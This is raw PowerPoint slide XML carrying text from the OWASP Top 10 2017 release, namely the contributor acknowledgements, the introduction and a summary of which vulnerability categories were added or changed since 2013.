                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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75992586"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3810001"/>
          <a:ext cx="3429000" cy="5334004"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="304799">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attribution</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4998724">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="just">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We'd like to thank the organizations that contributed their vulnerability data to support the 2017 update. We received more than 40 responses to the call for data. For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is publicly available. We believe this is one of the larger, more diverse collections of vulnerability data yet collected publicly. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">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As there are more contributors than space here, we have created a dedicated page to recognize the contributions made. We wish to give heartfelt thanks to these organizations for being willing to be on the front lines of publicly sharing vulnerability data from their efforts. We hope this will continue to grow and encourage more organizations to do the same and possibly be seen as one of the key milestones of evidence based security. The OWASP Top 10 would not be possible without these amazing contributions. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">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A big thank you to the 516 individuals who took the time to complete the industry ranked survey. Your voice helped determine two new additions to the Top 10. The additional comments, notes of encouragement (and criticisms), were all appreciated. We know your time is valuable and we wanted to say thanks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">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We would like to thank in advance those individuals who contribute significant constructive comments and time reviewing this update to the Top 10. As much as possible, we have listed them on the attribution page ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>+Ack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>’. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>And finally, we'd like to thank in advance all the translators out there that will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{006EF41C-22F0-4CD0-98DC-529189A47945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2528428806"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="2819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6391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pP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Welcome to the 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2017! </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2483009">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This major update adds several new issues, including two issues selected by the community - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Community feedback drove the collection of the most amount of data ever assembled in the preparation of an application security standard, and so we are confident that the remaining 8 issues are the most important for organizations to address, particularly the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017-Sensitive Data Exposure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> in the age of the EU's General Data Protection Regulation, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017-Security Misconfiguration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> especially around cloud and API services, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017-Using Components with Known Vulnerabilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which can be especially challenging for those on modern platforms, like node.js. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1">
                        <a:latin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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The OWASP Top 10 for 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> completed by 515 individuals</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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endParaRPr lang="en-US" sz="950" b="1">
                        <a:latin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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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endParaRPr lang="en-US" sz="950" b="1"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xmlns="" id="{53BBC665-1B35-4A1D-B9C5-F23A146454B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2044273068"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="81515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4800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>What changed from 2013 to 2017?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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7816229">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="900"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Over the last decade, and in particularly these last few years, the fundamental architecture of applications has changed significantly:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>JavaScript is now the primary language of the web. node.js and modern web frameworks such as Bootstrap, Electron, Angular, React amongst many others, means source that was once on the server is now running on untrusted browsers. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular front end user experiences, not to mention the rise and rise of mobile apps using the same APIs as single page applications.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microservices written in node.js and Spring Boot are replacing older enterprise service bus applications using EJBs and so on. Old code that never expected to be communicated with directly from the Internet is now sitting behind an API or RESTful web service. The assumptions that underlie this code, such as trusted callers, are simply not valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017-XML External Entity (XXE) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>is a new category primarily supported by SAST data sets. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by the community</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We asked the community to provide insight into two forward looking weakness categories. After 516 peer submissions, and  removing issues that were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, responsible for one of the worst breaches of all time, and</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, the lack of which can prevent or significantly delay malicious activity and breach detection, incident response and digital forensics.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Retired, but not forgotten</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
